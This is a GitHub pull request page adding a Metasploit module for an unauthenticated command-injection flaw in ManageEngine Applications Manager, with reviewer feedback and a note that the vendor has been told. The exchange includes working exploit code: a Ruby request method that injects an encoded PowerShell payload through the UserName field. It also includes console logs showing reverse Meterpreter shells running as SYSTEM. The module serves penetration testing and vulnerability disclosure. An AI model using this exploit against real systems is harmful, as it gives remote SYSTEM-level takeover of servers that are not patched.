New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Adding ManageEngine Application Manager RCE #9684

Merged
merged 7 commits into from Mar 27, 2018

Conversation

Projects
None yet
8 participants
@mmetince
Contributor

mmetince commented Mar 7, 2018

This module exploits command injection vulnerability -0day as far as I know- in the ManageEngine Application Manager product. An unauthenticated user can execute a operating system command under the context of privileged user.

A successful check of the exploit will look like this:

  • Start msfconsole
  • use exploit/linux/http/securityonion_xplico_exec
  • Set RHOST
  • Set PAYLOAD windows/meterpreter/reverse_tcp
  • Set LHOST
  • Run check
  • Verify that you are seeing The target is vulnerable. in console.
  • Run exploit
  • Verify that you are seeing Triggering the vulnerability in console.
  • Verify that you are seeing Sending stage (179779 bytes) to <TARGET> in console.
  • Verify that you have your shell.

Scenarios

msf5 > 
msf5 > use exploit/windows/http/manageengine_appmanager_exec 
msf5 exploit(windows/http/manageengine_appmanager_exec) > set RHOST 12.0.0.192
RHOST => 12.0.0.192
msf5 exploit(windows/http/manageengine_appmanager_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/manageengine_appmanager_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf5 exploit(windows/http/manageengine_appmanager_exec) > check
[+] 12.0.0.192:9090 The target is vulnerable.
msf5 exploit(windows/http/manageengine_appmanager_exec) > run

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Trigerring the vulnerability
[*] Sending stage (179779 bytes) to 12.0.0.192

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Technical Details and Module Demo
https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/

@jmartin-r7 jmartin-r7 requested a review from todb-r7 Mar 7, 2018

mmetince added some commits Mar 9, 2018

@mmetince

This comment has been minimized.

Contributor

mmetince commented Mar 12, 2018

This was my first time to using rubocop. I don't know how to fix following erros.

RuboCop: Layout/AlignParameters: Align the parameters of a method call if they span more than one line. [Layout/AlignParameters]
RuboCop: Layout/ClosingParenthesisIndentation: Align `)` with `(`. [Layout/ClosingParenthesisIndentation]
RuboCop: Layout/MultilineMethodCallBraceLayout: Closing method call brace must be on the same line as the last argument when opening brace is on the same line as the first argument. [Layout/MultilineMethodCallBraceLayout]

Those errors are mostly related with indentation of parameters of update_info method such as name, description etc and position of ( and ).

Any idea how to fix them too ? or ignore by updating .rubocop.yml file ?

@wvu-r7

This comment has been minimized.

Contributor

wvu-r7 commented Mar 12, 2018

@mmetince: You can read about the layout cops at https://rubocop.readthedocs.io/en/latest/cops_layout/.

You can also read its parent doc at https://github.com/bbatsov/ruby-style-guide. Cheers!

@mmetince

This comment has been minimized.

Contributor

mmetince commented Mar 13, 2018

Thanks @wvu-r7, I've solved em all. 👍
Looking forward for review now ^^

Go to following website and download Windows version of the product. It comes with built-in Java and Postgresql so you don't need to install anything else.
[https://www.manageengine.com/products/applications_manager/download.html](https://www.manageengine.com/products/applications_manager/download.html)
## Verification Steps

This comment has been minimized.

@bcoles

bcoles Mar 13, 2018

Contributor

These steps are a lie.

Consider:

1. Start `msfconsole`
2. `use exploit/windows/http/manageengine_appmanager_exec`
3. Set `RHOST <RHOST>`
4. Set `PAYLOAD windows/meterpreter/reverse_tcp`
5. Set `LHOST <LHOST>`
6. Run `check`
7. **Verify** that you are seeing `The target is vulnerable.` in console.
8. Run `exploit`
9. **Verify** that you are seeing `Triggering the vulnerability` in console.
10. **Verify** that you are seeing `Sending stage to <TARGET>` in console.
11. **Verify** that you have your shell.

This comment has been minimized.

@mmetince

mmetince Mar 13, 2018

Contributor

Ups sorry. I forgot to update from another module.

'isAgentAssociated' => 'false',
'displayname' => Rex::Text.rand_text_alpha(10),
'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
'Version' => '2013',

This comment has been minimized.

@bcoles

bcoles Mar 13, 2018

Contributor

Does 2013 need to be static?

'montype' => 'OfficeSharePointServer',
'isAgentEnabled' => 'NO',
'isAgentAssociated' => 'false',
'displayname' => Rex::Text.rand_text_alpha(10),

This comment has been minimized.

@bcoles

bcoles Mar 13, 2018

Contributor

Randomization for the win:

        'displayname' => Rex::Text.rand_text_alpha(rand(10..15)),
print_status('Triggering the vulnerability')
send_request_cgi(

This comment has been minimized.

@bcoles

bcoles Mar 13, 2018

Contributor

Does the server return a response when exploitation is successful, or does triggering the payload cause the request to timeout?

If the server returns a response, it might be nice to validate the response and print an appropriate message.

This comment has been minimized.

@mmetince

mmetince Mar 13, 2018

Contributor

Nope, since this command injection issue a request that exploits the vulnerability will be hanging on.

)
end
def check

This comment has been minimized.

@bcoles

bcoles Mar 13, 2018

Contributor

Perhaps I missed something, but it looks like the HTTP request in the check method and exploit method are almost identical, with the exception of the UserName.

You could create a new method which takes a username parameter and returns the result of the send_request_cgi call, then call this method from both the check method and exploit method.

Not required, but it's nice to be DRY :)

Something like this:

  def test_credential(username)
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
      'vars_post' => {
        'method' => 'testCredentialForConfMonitors',
        'type' => 'OfficeSharePointServer',
        'montype' => 'OfficeSharePointServer',
        'isAgentEnabled' => 'NO',
        'isAgentAssociated' => 'false',
        'displayname' => Rex::Text.rand_text_alpha(rand(10..15)),
        'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
        'Version' => '2013',
        'Powershell' => 'True', # :-)
        'CredSSP' => 'False',
        'SPType' => 'SPServer',
        'CredentialDetails' => 'nocm',
        'Password' => Rex::Text.rand_text_alpha(rand(3..10)),
        'UserName' => username
      }
    )
  end

  def check
    res = test_credential(Rex::Text.rand_text_alpha(rand(3..10)))

    unless res
      vprint_error('Connection failed')
      return CheckCode::Unknown
    end

    if res.body.include?('Kindly check the credentials and try again')
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    powershell_options = {
      encode_final_payload: true,
      remove_comspec: true
    }
    p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)

    print_status('Triggering the vulnerability')

    test_credential("$(#{p})")
  end

This comment has been minimized.

@mmetince

mmetince Mar 13, 2018

Contributor

Couldn't agree more. Done^^

@todb-r7

This comment has been minimized.

Contributor

todb-r7 commented Mar 13, 2018

While letting the vendor know about this bug, I notice that their bug bounty calls it Applications Manager (note the plural). Just fyi. I wonder how many of our modules are incorrect.

@todb-r7

This comment has been minimized.

Contributor

todb-r7 commented Mar 13, 2018

There, let the vendor know, they're tracking it as ZVE-2018-0492, in case you haven't done this already, @mmetince

@todb-r7

Left a comment but it's a tiny nit to pick. We probably need to grep through the other modules for this inconsistency, so don't consider this a hold up.

super(update_info(info,
'Name' => "ManageEngine Applications Manager Remote Code Execution",
'Description' => %q(
This module exploits command injection vulnerability in the ManageEngine Application Manager product.

This comment has been minimized.

@todb-r7

todb-r7 Mar 13, 2018

Contributor

Should be Applications Manager, not Application Manager (apparently)

@mmetince

This comment has been minimized.

Contributor

mmetince commented Mar 13, 2018

I will replace "application" with "applications", thank you very much @todb-r7.
Please let me know if I need to do other changes so I can fix them all within single commit.

@bcoles

bcoles approved these changes Mar 14, 2018

A couple tiny nitpicks with the grammar in the description.

It may also be worth adding the
[ 'BID' => '103358' ]
and patch URL
[ 'URL' => 'https://pitstop.manageengine.com/portal/community/topic/security-vulnerability-issues-fixed-upgrade-to-the-latest-version-of-applications-manager' ]
to the References array.

Approved, but untested.

@gokhansagoglu

This comment has been minimized.

gokhansagoglu commented Mar 19, 2018

It works very well. Tested using Applications Manager build 13630 on Windows 8.1 Pro.

screenshot at mar 19 23-35-14

Great job!

@wchen-r7

This comment has been minimized.

Contributor

wchen-r7 commented Mar 27, 2018

Love ManageEngine vulns.

@wchen-r7 wchen-r7 self-assigned this Mar 27, 2018

@wchen-r7

This comment has been minimized.

Contributor

wchen-r7 commented Mar 27, 2018

Works for me:

msf5 exploit(windows/http/manageengine_appmanager_exec) > check
[+] 172.16.249.180:9090 The target is vulnerable.
msf5 exploit(windows/http/manageengine_appmanager_exec) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] Triggering the vulnerability
[*] Sending stage (180291 bytes) to 172.16.249.180
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.180:50377) at 2018-03-27 15:13:14 -0500

@wchen-r7 wchen-r7 merged commit 53eabfc into rapid7:master Mar 27, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully ran sanity checks.
Details
Metasploit Automation - Test Execution Successfully ran `autoPayloadTest.py`.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wchen-r7 added a commit that referenced this pull request Mar 27, 2018

@wchen-r7

This comment has been minimized.

Contributor

wchen-r7 commented Mar 27, 2018

Release Notes

The exploits/windows/http/manageengine_appmanager_exec module has been added to the framework. It exploits command injection vulnerability in the ManageEngine Application Manager product. An unauthenticated user can execute an operating system command under the context of a privileged user.

msjenkins-r7 added a commit that referenced this pull request Mar 27, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment